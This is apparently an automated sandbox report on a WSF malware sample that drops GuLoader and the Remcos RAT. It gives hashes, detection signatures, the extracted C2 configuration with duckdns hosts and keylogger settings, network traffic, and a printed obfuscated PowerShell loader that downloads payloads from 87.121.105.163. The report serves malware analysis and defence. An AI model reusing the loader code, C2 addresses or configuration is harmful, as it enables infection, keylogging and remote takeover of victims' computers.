Windows Analysis Report
rOferta_SKGNMECLemnedefinitionen353523577.wsf

Overview

General Information

Sample name:	rOferta_SKGNMECLemnedefinitionen353523577.wsf
Analysis ID:	1429076
MD5:	ed7122bfc1517425a483908cff86d950
SHA1:	d71986894ac69f6958f3e126bec9eaabea50fa5c
SHA256:	813142e22c4d2a79a49e1f96a9bea8b14e13a67eb9d35922b5ac0b88b33aec6a
Tags:	wsf
Infos:

Detection

GuLoader, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Installs a global keyboard hook

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious execution chain found

Suspicious powershell command line found

Uses dynamic DNS services

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing

Found malware configuration

Source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: jgbours284hawara01.duckdns.org	Virustotal: Detection: 6%	Perma Link
Source: jgbours284hawara01.duckdns.org	Virustotal: Detection: 6%	Perma Link
Source: http://87.121.105.163	Virustotal: Detection: 17%	Perma Link
Source: http://87.121.105.163/Belyves242.hhk	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: rOferta_SKGNMECLemnedefinitionen353523577.wsf

Virustotal: Detection: 11%

Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbj` source: powershell.exe, 00000005.00000002.2487543790.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2116269833.0000023C50A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2118566911.0000023C4EC7B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2487543790.000000000722D000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:49720 -> 45.88.90.110:3050
Source: Traffic	Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 45.88.90.110:3050 -> 192.168.2.6:49720

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: jgbours284hawara01.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: jgbours284hawara01.duckdns.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49720 -> 45.88.90.110:3050

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 87.121.105.163 87.121.105.163
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LVLT-10753US LVLT-10753US

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Belyves242.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163

Source: global traffic	HTTP traffic detected: GET /Belyves242.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: jgbours284hawara01.duckdns.org

Source: powershell.exe, 00000002.00000002.2558490378.0000023D5BBC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/Belyves242.hhkP
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/Belyves242.hhkXR
Source: wab.exe, 0000000A.00000002.4619411205.0000000022580000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
Source: wab.exe, 0000000A.00000002.4619411205.0000000022580000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binFokusGulduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binPPv
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bini
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binm
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5BF19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.H
Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpg
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpw
Source: powershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5B4AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Source: amsi32_1492.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6256, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5596
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 5596
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5596	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 5596	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3489B1A6	2_2_00007FFD3489B1A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3489BF52	2_2_00007FFD3489BF52
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348964FB	2_2_00007FFD348964FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34895CD8	2_2_00007FFD34895CD8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34893BFB	2_2_00007FFD34893BFB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046BF250	5_2_046BF250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046BFB20	5_2_046BFB20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046BEF08	5_2_046BEF08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04909350	5_2_04909350

Source: amsi32_1492.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6256, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6256
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1492

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf"
